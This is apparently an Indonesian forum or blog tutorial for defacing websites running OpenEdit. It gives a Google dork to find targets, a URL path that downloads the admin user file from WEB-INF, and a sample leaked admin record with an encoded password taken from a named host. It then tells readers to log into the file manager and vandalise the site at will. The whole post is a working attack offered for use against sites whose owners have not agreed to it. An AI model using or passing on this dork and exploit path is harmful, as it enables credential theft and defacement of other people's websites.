Exploit Openedit ( Deface )

[#] Dorknya :



Code:
inurl:openedit/authentication/

[#] Exploitnya :



Code:
/openedit/files/download/WEB-INF/users/admin.xml

langsung saja gak usah banyak bacot lagi ..
kita langsung masuk step by step cara defacenya .. >:)
kalo berhasil deface , jangan lupa cendol :p =))

========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap

========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://mcdev.openedit.com/

========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni : http://mcdev.openedit.com/openedit/files...admin.xml/

========
[#] Step 4
========
- nah , kamu disuruh unduh kan , unduh aja tu file XMLnya
setelah diunduh buka File XML yang unduh kamu tadi

========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi

PHP Code:


- <user></user>
  <user-name>admin</user-name>
  <password>DES:en9gFy2YMf0=</password>
  <creation-date>1145462580187</creation-date>
- <properties></properties>
  <property></property>
  <property></property>
  <property></property>
  <property></property>
  <property></property>
  <property></property>
  <property></property>
  <property></property>
  <property></property>
 
  <group></group>
  <group></group>
  <group></group>
  <group></group>
  

========
[#] Step 5
========
- Nah Tu Udah keliatan Pass adminnya
Langsung Aja Deh Login Kesini
http://mcdev.openedit.com/openedit/filemanager


========
[#] Step 6
========
- Done , Mision Selesai
Silakan Oprek Oprek sesuka Hati tu Web , kalo aku si langsung tak pepes aja , xixixi


========
NB : Dorknya Kurang Ampuh , silakan di kembangkan Lagi
LihatTutupKomentar
loading...